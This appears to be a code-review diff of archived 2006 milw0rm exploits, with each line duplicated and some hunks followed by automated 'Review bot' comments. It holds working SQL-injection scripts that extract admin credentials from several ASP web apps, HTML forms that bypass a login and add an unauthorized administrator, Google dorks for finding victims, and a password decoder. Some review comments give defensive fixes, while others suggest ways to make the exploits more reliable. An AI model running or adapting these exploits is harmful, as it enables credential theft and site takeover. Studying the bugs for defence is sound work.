print $penta "Host: $pentaserver\n"; print $penta "Host: $pentaserver\n";
print $penta "Accept: */*\n"; print $penta "Accept: */*\n";
print $penta "Connection: close\n\n"; print $penta "Connection: close\n\n";
print "+ Connected!...\n"; print "+ Connected!...\n";
while($answer = <$penta>) { while($answer = <$penta>) {
if ($answer =~ /class=\"newsdetailtitle\">(.*?)<\/td>/){ if ($answer =~ /class=\"newsdetailtitle\">(.*?)<\/td>/){
print "+ Exploit succeed! Getting USERID: $pentaid admin login information.\n"; print "+ Exploit succeed! Getting USERID: $pentaid admin login information.\n";
print "+ ---------------- +\n"; print "+ ---------------- +\n";
print "+ USERNAME: $1\n"; print "+ USERNAME: $1\n";
} }
if ($answer =~ /<td align=\"right\" class=\"style9px\">(.*?)&nbsp;/) { if ($answer =~ /<td align=\"right\" class=\"style9px\">(.*?)&nbsp;/) {
print "+ PASSWORD: $1\n"; print "+ PASSWORD: $1\n";
print "+ ---------------- +\n"; print "+ ---------------- +\n";
print "+ Lets go $pentahost$pentadir$pentafinal and\n+ Login with this information. \n"; print "+ Lets go $pentahost$pentadir$pentafinal and\n+ Login with this information. \n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); exit();
} }
if ($answer =~ /Internal Server Error/) { if ($answer =~ /Internal Server Error/) {
print "+ This version of Pentacle In-Out Board is vulnerable too but default query of SQL-inject doesnt work on it\n"; print "+ This version of Pentacle In-Out Board is vulnerable too but default query of SQL-inject doesnt work on it\n";
print "+ So please edit query by manually adding or removing null datas..\n"; print "+ So please edit query by manually adding or removing null datas..\n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); exit();
} }
if ($answer =~ /number of columns/) { if ($answer =~ /number of columns/) {
print "+ This version of Pentacle In-Out Board is vulnerable too but default query of SQL-inject doesnt work on it\n"; print "+ This version of Pentacle In-Out Board is vulnerable too but default query of SQL-inject doesnt work on it\n";
print "+ So please edit query by manually adding or removing null datas..\n"; print "+ So please edit query by manually adding or removing null datas..\n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); exit();
} }
} }
print "+ Try another userid maybe this one not the admin.\n"; print "+ Try another userid maybe this one not the admin.\n";
print "+ Exploit failed :(\n"; print "+ Exploit failed :(\n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
# nukedx.com [2006-02-25] # nukedx.com [2006-02-25]
# milw0rm.com [2006-02-25] # milw0rm.com [2006-02-25]
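Review bot: the usage comment `#Usage: penta.pl <victim> <directory>` disagrees with the banner and with the code, which require a third `<userid>` argument (`if(@ARGV < 3)` and `$pentaid = $ARGV[2]`); fix the comment. The two branches matching `Internal Server Error` and `number of columns` have identical bodies and can be a single branch with an alternation. The username branch prints and keeps looping while the password branch exits, so if the password row is rendered before the username row the username is never shown; collect both and print after the loop. As with the other scripts in this commit, the request line `GET $pentareq\n` carries no HTTP version and uses bare `\n` line endings. From the defender's side, both error branches work only because `newsdetailsview.asp` leaks database errors; suppressing them and parameterising `newsid` closes both the oracle and the injection.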


@ -1,36 +1,36 @@
<html> <html>
<title>Pentacle In-Out Board <= 6.03 (login.asp) Authencation ByPass Vulnerability</title> <title>Pentacle In-Out Board <= 6.03 (login.asp) Authencation ByPass Vulnerability</title>
<script language=javascript> <script language=javascript>
function ptxpl(){ function ptxpl(){
if(document.xpl.victim.value=="") { if(document.xpl.victim.value=="") {
alert("Please enter site!"); alert("Please enter site!");
return false; return false;
} }
if(confirm("Are you sure?")) { if(confirm("Are you sure?")) {
xpl.action="http://"+document.xpl.victim.value+"/login.asp"; xpl.action="http://"+document.xpl.victim.value+"/login.asp";
xpl.username.value=document.xpl.username.value; xpl.username.value=document.xpl.username.value;
xpl.userpassword.value=document.xpl.userpassword.value; xpl.userpassword.value=document.xpl.userpassword.value;
xpl.submit(); xpl.submit();
} }
} }
</script> </script>
<strong> <strong>
<font face="Tahoma" size="2"> <font face="Tahoma" size="2">
Fill in the blank !:D<br> Fill in the blank !:D<br>
Just enter host/path/ not http://host/path/!<br> Just enter host/path/ not http://host/path/!<br>
If Pentacle installed on / just enter host<br> If Pentacle installed on / just enter host<br>
Example: host.com<br> Example: host.com<br>
Example2: host.com/ptdir/<br> Example2: host.com/ptdir/<br>
<form name="xpl" method="POST" action="http://pentacle.g2soft.net/login.asp" onsubmit=ptxpl();> <form name="xpl" method="POST" action="http://pentacle.g2soft.net/login.asp" onsubmit=ptxpl();>
Target -> <input type="text" name="victim" value="pentacle.g2soft.net" size="50"> Target -> <input type="text" name="victim" value="pentacle.g2soft.net" size="50">
<input type="hidden" name="username" value="any"> <input type="hidden" name="username" value="any">
<input type="hidden" name="userpassword" value="' or '1'='1"> <input type="hidden" name="userpassword" value="' or '1'='1">
<input type="submit" value="Send"> <input type="submit" value="Send">
</table></form> </table></form>
</html> </html>
Save this code as .htm and then execute. Save this code as .htm and then execute.
# nukedx.com [2006-02-25] # nukedx.com [2006-02-25]
# milw0rm.com [2006-02-25] # milw0rm.com [2006-02-25]
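Review bot: the empty-target check in `ptxpl()` never prevents submission because `onsubmit=ptxpl();` discards the function's return value (and the attribute value is unquoted); it needs `onsubmit="return ptxpl();"`, and on the confirm path `ptxpl()` should return false after `xpl.submit()` to avoid submitting twice. The default `action` and the prefilled `victim` value point at `pentacle.g2soft.net`, which looks like the vendor's own demo host; a published PoC should default to a placeholder, not a live third-party system. The closing `</table>` has no opening `<table>`, and `xpl.action=` relies on the form name being reachable through the global scope; `document.xpl.action` is the explicit form. The payload itself, `' or '1'='1` in `userpassword`, documents that `login.asp` concatenates the password into its query; the mitigation is a parameterised query against a stored password hash, not string equality evaluated inside SQL.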


@ -1,66 +1,66 @@
Original advisory: http://www.nukedx.com/?viewdoc=18 Original advisory: http://www.nukedx.com/?viewdoc=18
Advisory by: nukedx Advisory by: nukedx
Full PoC Full PoC
Explotation: Explotation:
GET -> http://[victim]/[dir]/index.asp?secao=[PageID]&id=[SQL] GET -> http://[victim]/[dir]/index.asp?secao=[PageID]&id=[SQL]
EXAMPLE 1 -> http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha+from+administradores EXAMPLE 1 -> http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha+from+administradores
EXAMPLE 2 -> http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login+from+administradores EXAMPLE 2 -> http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login+from+administradores
with example 1 remote attacker can get admin's encrypted password and with example 2 remote attacker can get admin's login name with example 1 remote attacker can get admin's encrypted password and with example 2 remote attacker can get admin's login name
[PageID]: must be working page id you can get some from frontpage. [PageID]: must be working page id you can get some from frontpage.
<--Decrypter code--> <--Decrypter code-->
<--Note: This decrypter just decrypts default data <--Note: This decrypter just decrypts default data
If webmaster changed te_chave value in funcoes.asp If webmaster changed te_chave value in funcoes.asp
this decrypter wont decrypt data so you need to this decrypter wont decrypt data so you need to
make your own decrypter make your own decrypter
--> -->
<--C Source--> <--C Source-->
/********************************************* /*********************************************
* TotalECommerce PWD Decrypter * * TotalECommerce PWD Decrypter *
* Coded by |SaMaN| for nukedx * * Coded by |SaMaN| for nukedx *
* http://www.k9world.org * * http://www.k9world.org *
* IRC.K9World.Org * * IRC.K9World.Org *
*Advisory: http://www.nukedx.com/?viewdoc=18 * *Advisory: http://www.nukedx.com/?viewdoc=18 *
**********************************************/ **********************************************/
#include <stdio.h> #include <stdio.h>
#include <stdlib.h> #include <stdlib.h>
#include <string.h> #include <string.h>
#include <ctype.h> #include <ctype.h>
int main() int main()
{ {
char buf[255]; char buf[255];
char buf2[255]; char buf2[255];
char buf3[255]; char buf3[255];
char *texto; char *texto;
char *vcrypt; char *vcrypt;
int i,x,z,t = 0; int i,x,z,t = 0;
char saman; char saman;
texto = buf; texto = buf;
vcrypt = buf2; vcrypt = buf2;
printf("%s", "|=------------------------------------=|\n"); printf("%s", "|=------------------------------------=|\n");
printf("%s", " Coded by |SaMaN| @ IRC.K9World.Org\n"); printf("%s", " Coded by |SaMaN| @ IRC.K9World.Org\n");
printf("%s", "|=------------------------------------=|\n\n"); printf("%s", "|=------------------------------------=|\n\n");
printf("%s", "Enter crypted password: "); printf("%s", "Enter crypted password: ");
scanf("%200s", buf); scanf("%200s", buf);
if (!texto) if (!texto)
vcrypt = ""; vcrypt = "";
for (i = 0; i < strlen(texto); i++) for (i = 0; i < strlen(texto); i++)
{ {
if ((vcrypt == "") || (i > strlen(texto))) if ((vcrypt == "") || (i > strlen(texto)))
x = 1; x = 1;
else else
x = x + 1; x = x + 1;
t = buf[i]; t = buf[i];
z = 255 - t; z = 255 - t;
saman = toascii(z); saman = toascii(z);
snprintf(buf3, 250, "%c", saman); snprintf(buf3, 250, "%c", saman);
strncat(buf2, buf3, 250); strncat(buf2, buf3, 250);
} }
printf("Result: %s\n", buf2); printf("Result: %s\n", buf2);
return; return;
} }
<--End of code--> <--End of code-->
<--Thanks |SaMaN| for decrypter--> <--Thanks |SaMaN| for decrypter-->
// milw0rm.com [2006-03-04] // milw0rm.com [2006-03-04]
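Review bot: the C decrypter has several defects that leave its output undefined: `buf2` is never initialised before `strncat(buf2, buf3, 250)` appends to it (set `buf2[0] = '\0'` first), `vcrypt == ""` compares a pointer with the address of a string literal and is never true, `if (!texto)` cannot fire because `texto` was just assigned `buf`, `x` is incremented without ever being initialised (`int i,x,z,t = 0;` initialises only `t`) and is never read, and `return;` in `int main()` returns no value. Once those are stripped the loop reduces to `out[i] = 255 - in[i]` over the input, so the "encryption" this advisory describes is a fixed byte complement, i.e. reversible obfuscation rather than password hashing; that, and not only the injection in `index.asp?id=`, is what a vendor fix has to address (store a salted password hash, parameterise `id`). Also `<--Decrypter code-->` and the other pseudo-comments are not valid HTML comments (`<!-- -->`), and "Explotation" is misspelt.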


@ -1,68 +1,68 @@
#!/usr/bin/perl #!/usr/bin/perl
#Method found & Exploit scripted by nukedx #Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com #Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Usage: cilem.pl <victim> <directory> #Usage: cilem.pl <victim> <directory>
#Original Advisory: http://www.nukedx.com/?viewdoc=10 #Original Advisory: http://www.nukedx.com/?viewdoc=10
#googledork [ inurl:yazdir.asp?haber_id= ] 2.140 pages... #googledork [ inurl:yazdir.asp?haber_id= ] 2.140 pages...
use IO::Socket; use IO::Socket;
if(@ARGV < 2){ if(@ARGV < 2){
print " print "
+***********************************************************************+ +***********************************************************************+
+Welcome to CilemNews System <= 1.1 (yazdir.asp haber_id) SQL-inject xpl+ +Welcome to CilemNews System <= 1.1 (yazdir.asp haber_id) SQL-inject xpl+
+ Usage: cilem.pl <victim> <directory> + + Usage: cilem.pl <victim> <directory> +
+ Example: cilem.pl sux.com / + + Example: cilem.pl sux.com / +
+ googledork [ inurl:yazdir.asp?haber_id= ] + + googledork [ inurl:yazdir.asp?haber_id= ] +
+ Method found & Exploit scripted by nukedx + + Method found & Exploit scripted by nukedx +
+***********************************************************************+ +***********************************************************************+
"; ";
exit(); exit();
} }
#Local variables #Local variables
$cilemserver = $ARGV[0]; $cilemserver = $ARGV[0];
$cilemserver =~ s/(http:\/\/)//eg; $cilemserver =~ s/(http:\/\/)//eg;
$cilemhost = "http://".$cilemserver; $cilemhost = "http://".$cilemserver;
$port = "80"; $port = "80";
$cilemdir = $ARGV[1]; $cilemdir = $ARGV[1];
$cilemtar = "yazdir.asp?haber_id="; $cilemtar = "yazdir.asp?haber_id=";
$cilemfinal = "admin/giris.asp"; $cilemfinal = "admin/giris.asp";
$cilemxp = "1%20union%20select%200,admin,sifre,0,0,0,0,0,0,0,0,0,0,0%20from%20ayarlar%20where%20admin=admin"; $cilemxp = "1%20union%20select%200,admin,sifre,0,0,0,0,0,0,0,0,0,0,0%20from%20ayarlar%20where%20admin=admin";
$cilemreq = $cilemhost.$cilemdir.$cilemtar.$cilemxp; $cilemreq = $cilemhost.$cilemdir.$cilemtar.$cilemxp;
#Writing data to socket #Writing data to socket
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
print "+ Trying to connect: $cilemserver\n"; print "+ Trying to connect: $cilemserver\n";
$cilem = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$cilemserver", PeerPort => "$port") || die "\n+ Connection failed...\n"; $cilem = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$cilemserver", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $cilem "GET $cilemreq\n"; print $cilem "GET $cilemreq\n";
print $cilem "Host: $cilemserver\n"; print $cilem "Host: $cilemserver\n";
print $cilem "Accept: */*\n"; print $cilem "Accept: */*\n";
print $cilem "Connection: close\n\n"; print $cilem "Connection: close\n\n";
print "+ Connected!...\n"; print "+ Connected!...\n";
while($answer = <$cilem>) { while($answer = <$cilem>) {
if ($answer =~ /font-weight:700\">(.*?)<\/b><\/td>/){ if ($answer =~ /font-weight:700\">(.*?)<\/b><\/td>/){
print "+ Exploit succeed! Getting admin's information.\n"; print "+ Exploit succeed! Getting admin's information.\n";
print "+ ---------------- +\n"; print "+ ---------------- +\n";
print "+ USERNAME: $1\n"; print "+ USERNAME: $1\n";
} }
if ($answer =~ /(.*?)<\/font><\/td>/) { if ($answer =~ /(.*?)<\/font><\/td>/) {
print "+ PASSWORD: $1\n"; print "+ PASSWORD: $1\n";
print "+ ---------------- +\n"; print "+ ---------------- +\n";
print "+ Lets go $cilemhost$cilemdir$cilemfinal and\n+ Login with this information. \n"; print "+ Lets go $cilemhost$cilemdir$cilemfinal and\n+ Login with this information. \n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); exit();
} }
if ($answer =~ /Internal Server Error/) { if ($answer =~ /Internal Server Error/) {
print "+ This version of CilemNews is vulnerable too but default query of SQL-inject doesnt work on it\n"; print "+ This version of CilemNews is vulnerable too but default query of SQL-inject doesnt work on it\n";
print "+ So please edit query by manually adding or removing null datas..\n"; print "+ So please edit query by manually adding or removing null datas..\n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); exit();
} }
if ($answer =~ /number of columns/) { if ($answer =~ /number of columns/) {
print "+ This version of CilemNews is vulnerable too but default query of SQL-inject doesnt work on it\n"; print "+ This version of CilemNews is vulnerable too but default query of SQL-inject doesnt work on it\n";
print "+ So please edit query by manually adding or removing null datas..\n"; print "+ So please edit query by manually adding or removing null datas..\n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); exit();
} }
} }
print "+ Exploit failed :(\n"; print "+ Exploit failed :(\n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
# milw0rm.com [2006-03-07] # milw0rm.com [2006-03-07]
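Review bot: the injected `where admin=admin` compares the column with itself and so filters nothing; if the intent was to select a specific row it needs a quoted literal, and as written the script simply relies on the first row returned. The password match `/(.*?)<\/font><\/td>/` is unanchored and matches any line ending in `</font></td>`, so the first such line on the page is printed as PASSWORD and the script exits, possibly before the USERNAME line has been seen; collect both matches and print after the loop. As in the sibling scripts, the request line `GET $cilemreq\n` has no HTTP version and bare `\n` endings, and the `Internal Server Error` / `number of columns` branches are duplicated verbatim and can be merged. The defensive reading of the hunk is that `yazdir.asp?haber_id=` concatenates its parameter into SQL and that the application renders database errors to the client; both need to go in the vendor fix.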


@ -1,55 +1,55 @@
#!/usr/bin/perl -w #!/usr/bin/perl -w
# D2KBLOG SQL injection # D2KBLOG SQL injection
# Discovered by : Farhad Koosha [ farhadkey [at} kapda.ir ] # Discovered by : Farhad Koosha [ farhadkey [at} kapda.ir ]
# Exploited by : devil_box [ devil_box [at} kapda.ir ] # Exploited by : devil_box [ devil_box [at} kapda.ir ]
# member of : Kapda.ir - Security Science Researchers Institute of Iran (persianhacker.net) # member of : Kapda.ir - Security Science Researchers Institute of Iran (persianhacker.net)
require LWP::UserAgent; require LWP::UserAgent;
require HTTP::Request; require HTTP::Request;
print "\r\n\r\n=-=-=-==================================================================-=-=-=\r\n\r\n"; print "\r\n\r\n=-=-=-==================================================================-=-=-=\r\n\r\n";
print " KAPDA - Security Science Researchers Institute of Iran\r\n\r\n"; print " KAPDA - Security Science Researchers Institute of Iran\r\n\r\n";
print " PoC for D2KBLOG SQL injection bug - Administrator Password Extractor\r\n\r\n"; print " PoC for D2KBLOG SQL injection bug - Administrator Password Extractor\r\n\r\n";
print " Original Source : http://kapda.ir/advisory-287.html (persianhacker.net)\r\n\r\n"; print " Original Source : http://kapda.ir/advisory-287.html (persianhacker.net)\r\n\r\n";
print "\r\n=-=-=-==================================================================-=-=-=\r\n"; print "\r\n=-=-=-==================================================================-=-=-=\r\n";
if (@ARGV != 2) if (@ARGV != 2)
{ {
print " Usage: kapda_D2KBLOG_xpl.pl [Target Domain] [Vulnerable Page]\n\r\n"; print " Usage: kapda_D2KBLOG_xpl.pl [Target Domain] [Vulnerable Page]\n\r\n";
print " ex: kapda_D2KBLOG_xpl.pl www.target.com /blog/profile.asp\n\r\n"; print " ex: kapda_D2KBLOG_xpl.pl www.target.com /blog/profile.asp\n\r\n";
exit (); exit ();
} }
my $ua = LWP::UserAgent->new(env_proxy => 1,keep_alive => 1,timeout => 30,); my $ua = LWP::UserAgent->new(env_proxy => 1,keep_alive => 1,timeout => 30,);
my $Path = $ARGV[0]; my $Path = $ARGV[0];
my $Page = $ARGV[1]; my $Page = $ARGV[1];
my $URL = "http://".$Path.$Page; my $URL = "http://".$Path.$Page;
print "|***| Connecting to ".$URL." ...\r\n"; print "|***| Connecting to ".$URL." ...\r\n";
$r = HTTP::Request->new(GET => $URL."?action=edit"); $r = HTTP::Request->new(GET => $URL."?action=edit");
$r->header( "Cookie" =>$Path."=memPassword=&memStatus=&memName=<!--'UNION%20ALL%20select%201,1,1,'**stxt**|UserName|:|'%2bmem_name%2b'|-=-|Password|:|'%2bmem_password%2b'|**etxt**',1,1,1,1,1,1,1,1,'Discovered%20and%20coded%20by%20farhadkey%20from%20KAPDA.ir'%20from%20blog_member%20where%20mem_status='SupAdmin'%20or%20'1'='-->" ); $r->header( "Cookie" =>$Path."=memPassword=&memStatus=&memName=<!--'UNION%20ALL%20select%201,1,1,'**stxt**|UserName|:|'%2bmem_name%2b'|-=-|Password|:|'%2bmem_password%2b'|**etxt**',1,1,1,1,1,1,1,1,'Discovered%20and%20coded%20by%20farhadkey%20from%20KAPDA.ir'%20from%20blog_member%20where%20mem_status='SupAdmin'%20or%20'1'='-->" );
$res = $ua->request($r); $res = $ua->request($r);
print "|***| Connected !\r\n"; print "|***| Connected !\r\n";
if ($res->is_success) { if ($res->is_success) {
print "|***| Extracting Username and Password ...\r\n\r\n"; print "|***| Extracting Username and Password ...\r\n\r\n";
my $results = $res->content; my $results = $res->content;
while($results=~/\"\*\*stxt\*\*(.*?)\*\*etxt\*\*\"/ig){ print "-=-> $1 \r\n"; } while($results=~/\"\*\*stxt\*\*(.*?)\*\*etxt\*\*\"/ig){ print "-=-> $1 \r\n"; }
print "\r\n Exploit by Devil_Box\r\n Discovery by Farhad koosha\r\n\r\n"; print "\r\n Exploit by Devil_Box\r\n Discovery by Farhad koosha\r\n\r\n";
} else { } else {
die "\r\n|***| ".$res->status_line; die "\r\n|***| ".$res->status_line;
} }
# milw0rm.com [2006-03-09] # milw0rm.com [2006-03-09]
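Review bot: the injection in this hunk travels in the `Cookie` header (the `memName=` value built on the `$r->header( "Cookie" => ...)` line), not in the query string, so any request inspection or WAF rule that only covers URL parameters and POST bodies misses it entirely; on the application side, cookie values must be bound as parameters like every other client-controlled input. The payload is wrapped in `<!--` ... `-->` and the script reads its result back out of `$res->content` between `**stxt**` and `**etxt**` markers, which means the cookie value is reflected into the rendered page, so the same input path is also an output-encoding problem. Those fixed markers and the hard-coded string `Discovered and coded by farhadkey from KAPDA.ir` make a usable response-side signature for detection.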


@ -1,57 +1,57 @@
<html> <html>
<title>Jiros Banner Experience Pro Unauthorized Admin Add Exploit</title> <title>Jiros Banner Experience Pro Unauthorized Admin Add Exploit</title>
<body bgcolor="#000000"> <body bgcolor="#000000">
<style> <style>
.xpl {font-family:tahoma; font-size:11px; text-decoration: none;} .xpl {font-family:tahoma; font-size:11px; text-decoration: none;}
</style> </style>
<script language="JavaScript"> <script language="JavaScript">
function jbxpl() { function jbxpl() {
if (document.xplt.victim.value=="") { if (document.xplt.victim.value=="") {
alert("Please enter site!"); alert("Please enter site!");
return false; return false;
} }
if (confirm("Are you sure?")) { if (confirm("Are you sure?")) {
xplt.action="http://"+document.xplt.victim.value+"files/update.asp?Action=AddAdmin"; xplt.action="http://"+document.xplt.victim.value+"files/update.asp?Action=AddAdmin";
xplt.aName.value=document.xplt.aName.value; xplt.aName.value=document.xplt.aName.value;
xplt.aEmail.value=document.xplt.aEmail.value; xplt.aEmail.value=document.xplt.aEmail.value;
xplt.aPassword.value=document.xplt.aPassword.value; xplt.aPassword.value=document.xplt.aPassword.value;
xplt.aIsSystemAdmin=document.xplt.aIsSystemAdmin.value; xplt.aIsSystemAdmin=document.xplt.aIsSystemAdmin.value;
xplt.aIsActive=document.xplt.aIsActive.value; xplt.aIsActive=document.xplt.aIsActive.value;
xplt.submit(); xplt.submit();
} }
} }
</script> </script>
<strong> <strong>
<font class="xpl" color="#00FF40"> <font class="xpl" color="#00FF40">
<pre> <pre>
<center> <center>
Welcome to Jiros Banner Experience Pro Unauthorized Admin Add Exploit Welcome to Jiros Banner Experience Pro Unauthorized Admin Add Exploit
This exploit has been coded by nukedx This exploit has been coded by nukedx
You can found original advisory on http://www.nukedx.com/?viewdoc=19 You can found original advisory on http://www.nukedx.com/?viewdoc=19
Dork for this exploit: <u>inurl:JBSPro</u> Dork for this exploit: <u>inurl:JBSPro</u>
Your target must be like that: www.victim.com/Path/ Your target must be like that: www.victim.com/Path/
The sites you found with given dork has like: www.victim.com/JBSPro/files or www.victim.com/JBSPro.asp The sites you found with given dork has like: www.victim.com/JBSPro/files or www.victim.com/JBSPro.asp
If the site has /JBSPro/files in link your target must be www.victim.com/JBSPro/ If the site has /JBSPro/files in link your target must be www.victim.com/JBSPro/
For second example your target must be www.victim.com/ For second example your target must be www.victim.com/
You can login with your admin account via www.victim.com/JBSPath/files/login.asp You can login with your admin account via www.victim.com/JBSPath/files/login.asp
Have phun Have phun
<form name="xplt" method="POST" onsubmit="jbxpl();"> <form name="xplt" method="POST" onsubmit="jbxpl();">
Target -> <input type="text" name="victim" value="www.victim.com/Path/" size="44" class="xpl"> Target -> <input type="text" name="victim" value="www.victim.com/Path/" size="44" class="xpl">
<input type="text" name="aName" value="Enter Username" class="xpl" size="30"> <input type="text" name="aName" value="Enter Username" class="xpl" size="30">
<input type="text" name="aEmail" value="Enter Email" class="xpl" size="30"> <input type="text" name="aEmail" value="Enter Email" class="xpl" size="30">
<input type="text" name="aPassword" value="Enter Password" class="xpl" size="30"> <input type="text" name="aPassword" value="Enter Password" class="xpl" size="30">
<input type="hidden" name="aIsSystemAdmin" value="True"> <input type="hidden" name="aIsSystemAdmin" value="True">
<input type="hidden" name="aIsActive" value="True"> <input type="hidden" name="aIsActive" value="True">
<input type="submit" value="Send" class="xpl"> <input type="submit" value="Send" class="xpl">
</form> </form>
</pre> </pre>
</font> </font>
</strong> </strong>
</body> </body>
</html> </html>
Save this code as .htm and then execute. Save this code as .htm and then execute.
# nukedx.com [2006-03-07] # nukedx.com [2006-03-07]
# milw0rm.com [2006-03-09] # milw0rm.com [2006-03-09]
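Review bot: the form in this hunk posts `aName`, `aEmail`, `aPassword` and the hidden `aIsSystemAdmin=True` / `aIsActive=True` fields to `files/update.asp?Action=AddAdmin` from an arbitrary third-party page with no session cookie or token of the attacker's involved, which is the missing-authorization defect the title names: the server must verify an authenticated administrator session before honouring `Action=AddAdmin` and bind every state-changing request to an anti-CSRF token so that a logged-in admin's browser cannot be made to submit it either. For detection, a POST to `update.asp` with `Action=AddAdmin` arriving with a foreign `Referer`, or any new administrator row created outside the application's own admin UI, is worth an alert. Minor: two of the assignments (`xplt.aIsSystemAdmin=...` and `xplt.aIsActive=...`) drop `.value` and so assign to the element reference rather than its value; the hidden inputs already carry `True`, so this changes nothing about the request.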


@ -1,67 +1,67 @@
#!/usr/bin/perl #!/usr/bin/perl
#Method found & Exploit scripted by nukedx #Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com #Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=20 #Original advisory: http://www.nukedx.com/?viewdoc=20
#Usage: beta.pl <host> <path> #Usage: beta.pl <host> <path>
#googledork: [ "Powered by bp blog" ] 9.710 pages.. #googledork: [ "Powered by bp blog" ] 9.710 pages..
use IO::Socket; use IO::Socket;
if(@ARGV != 2) { usage(); } if(@ARGV != 2) { usage(); }
else { exploit(); } else { exploit(); }
sub header() sub header()
{ {
print "\n- NukedX Security Advisory Nr.2006-20\r\n"; print "\n- NukedX Security Advisory Nr.2006-20\r\n";
print "- BetaParticle Blog <= 6.0 Remote SQL Injection Vulnerability\r\n"; print "- BetaParticle Blog <= 6.0 Remote SQL Injection Vulnerability\r\n";
} }
sub usage() sub usage()
{ {
header(); header();
print "- Usage: $0 <host> <path>\r\n"; print "- Usage: $0 <host> <path>\r\n";
print "- <host> -> Victim's host ex: www.victim.com\r\n"; print "- <host> -> Victim's host ex: www.victim.com\r\n";
print "- <path> -> Path to BetaParticle ex: /blog\r\n"; print "- <path> -> Path to BetaParticle ex: /blog\r\n";
exit(); exit();
} }
sub exploit () { sub exploit () {
#Our variables... #Our variables...
$bpserver = $ARGV[0]; $bpserver = $ARGV[0];
$bpserver =~ s/(http:\/\/)//eg; $bpserver =~ s/(http:\/\/)//eg;
$bphost = "http://".$bpserver; $bphost = "http://".$bpserver;
$bpdir = $ARGV[1]; $bpdir = $ARGV[1];
$bpport = "80"; $bpport = "80";
$bptar = "template_gallery_detail.asp?fldGalleryID="; $bptar = "template_gallery_detail.asp?fldGalleryID=";
$bpfinal = "main.asp"; $bpfinal = "main.asp";
$bpxp = "-1+UNION+SELECT+null,fldAuthorUsername,fldAuthorPassword,null,null+FROM+tblAuthor+where+fldAuthorId=1"; $bpxp = "-1+UNION+SELECT+null,fldAuthorUsername,fldAuthorPassword,null,null+FROM+tblAuthor+where+fldAuthorId=1";
$bpreq = $bphost.$bpdir.$bptar.$bpxp; $bpreq = $bphost.$bpdir.$bptar.$bpxp;
#Sending data... #Sending data...
header(); header();
print "- Trying to connect: $bpserver\r\n"; print "- Trying to connect: $bpserver\r\n";
$bp = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$bpserver", PeerPort => "$bpport") || die "- Connection failed...\n"; $bp = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$bpserver", PeerPort => "$bpport") || die "- Connection failed...\n";
print $bp "GET $bpreq HTTP/1.1\n"; print $bp "GET $bpreq HTTP/1.1\n";
print $bp "Accept: */*\n"; print $bp "Accept: */*\n";
print $bp "Referer: $bphost\n"; print $bp "Referer: $bphost\n";
print $bp "Accept-Language: tr\n"; print $bp "Accept-Language: tr\n";
print $bp "User-Agent: NukeZilla 4.3\n"; print $bp "User-Agent: NukeZilla 4.3\n";
print $bp "Cache-Control: no-cache\n"; print $bp "Cache-Control: no-cache\n";
print $bp "Host: $bpserver\n"; print $bp "Host: $bpserver\n";
print $bp "Connection: close\n\n"; print $bp "Connection: close\n\n";
print "- Connected...\r\n"; print "- Connected...\r\n";
while ($answer = <$bp>) { while ($answer = <$bp>) {
if ($answer =~ /<h3>(.*?)<\/h3>/) { if ($answer =~ /<h3>(.*?)<\/h3>/) {
print "- Exploit succeed! Getting admin's information\r\n"; print "- Exploit succeed! Getting admin's information\r\n";
print "- Username: $1\r\n"; print "- Username: $1\r\n";
} }
if ($answer =~ /<p>(.*?)<\/p>/) { if ($answer =~ /<p>(.*?)<\/p>/) {
print "- Password: $1\r\n"; print "- Password: $1\r\n";
print "- Lets go $bphost$bpdir$bpfinal for admin login.\r\n"; print "- Lets go $bphost$bpdir$bpfinal for admin login.\r\n";
exit(); exit();
} }
if ($answer =~ /number of columns/) { if ($answer =~ /number of columns/) {
print "- This version of BetaParticle is vulnerable too\r\n"; print "- This version of BetaParticle is vulnerable too\r\n";
print "- but default query of SQL-Inj. does not work on it\r\n"; print "- but default query of SQL-Inj. does not work on it\r\n";
print "- So please edit query by manually adding null data..\r\n"; print "- So please edit query by manually adding null data..\r\n";
exit(); exit();
} }
} }
print "- Exploit failed\n" print "- Exploit failed\n"
} }
# milw0rm.com [2006-03-18] # milw0rm.com [2006-03-18]
